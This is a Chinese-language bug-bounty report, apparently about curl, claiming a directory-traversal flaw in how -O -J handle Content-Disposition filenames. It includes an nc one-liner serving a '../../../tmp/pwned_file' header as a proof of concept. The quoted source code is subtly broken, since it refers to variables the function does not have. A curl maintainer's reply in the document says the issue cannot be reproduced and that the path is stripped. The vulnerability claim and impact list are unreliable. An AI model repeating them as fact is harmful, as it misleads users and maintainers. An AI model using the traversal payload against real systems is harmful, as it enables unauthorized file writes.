目录遍历漏洞报告

漏洞描述

src/tool_cb_hdr.c文件中的parse_filename函数未能充分验证和清理从HTTP Content-Disposition头中提取的文件名，当同时使用-O（远程名称）和-J（远程头名称）选项时，允许目录遍历攻击。

漏洞代码位置

文件： src/tool_cb_hdr.c 函数： parse_filename（约230-300行）

受影响代码路径：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


static char *parse_filename(const char *ptr, size_t len)
{
    // ... [文件名提取逻辑] ...
    if(per->config->output_dir) {
        outs->filename = curl_maprintf("%s/%s", per->config->output_dir,
                          filename);  // 漏洞点：文件名可能包含路径遍历
    }
    else
        outs->filename = filename;
    
    // 创建文件时缺乏足够的路径遍历检查
    if(!tool_create_output_file(outs, per->config))
        return CURL_WRITEFUNC_ERROR;
}

攻击场景

用户运行：curl -O -J http://malicious-server/file -o "/intended/output/dir"
恶意服务器响应头：Content-Disposition: attachment; filename="../../../etc/passwd"
cURL在/etc/passwd创建文件，而不是在/intended/output/dir/etc/passwd

概念验证

恶意服务器设置：

1

echo -e "HTTP/1.1 200 OK\r\nContent-Disposition: attachment; filename=\"../../../tmp/pwned_file\"\r\nContent-Length: 6\r\n\r\nPWNED" | nc -l -p 8080

漏洞利用命令：

1
2
3


# 触发漏洞的用户命令
curl -O -J http://localhost:8080/malicious-file -o "/safe/output/directory"
# 结果：文件在/tmp/pwned_file创建，而不是在/safe/output/directory/pwned_file

影响

直接影响

任意文件写入：攻击者可以在预期输出目录之外写入文件
文件覆盖：可以覆盖现有的系统文件
权限提升：当以提升的权限运行时，可以修改关键系统文件

攻击向量

恶意Web服务器：任何被入侵或恶意的服务器都可以利用此漏洞
中间人攻击：在未加密的连接中
缓存投毒：如果CDN或代理缓存被入侵

项目响应

curl staff评论： “-J的文档说明：如果服务器提供的文件名包含路径，在使用文件名之前会被剥离。因此这个报告听起来确实像是错误行为。然而文档确实警告：请谨慎使用此选项，但这并不能否定前面的陈述。我也找不到验证此路径剥离的测试。

但是，我无法复现这个问题，无论是在git HEAD版本还是7.88.1版本。请注意-o选项与-J冲突，最新版本的curl会对此发出警告。将该选项替换为--output-dir会导致curl按预期将pwned_file写入该目录；它会忽略Content-Disposition中的路径。你在哪个版本上复现的？”

项目政策： 根据项目的透明度政策，我们希望所有报告都被公开披露。

报告详情

报告ID： #3408126
严重程度： 中等（4 ~ 6.9）
披露时间： 2025年11月1日 21:22 UTC
弱点类型： 路径遍历
CVE ID： 无
赏金： 无

cURL目录遍历漏洞：Content-Disposition头处理的安全风险

本文详细分析了cURL工具在处理HTTP Content-Disposition头时存在的目录遍历漏洞，包括漏洞原理、攻击场景、PoC验证和修复建议，涉及源代码层面的安全缺陷和实际攻击影响。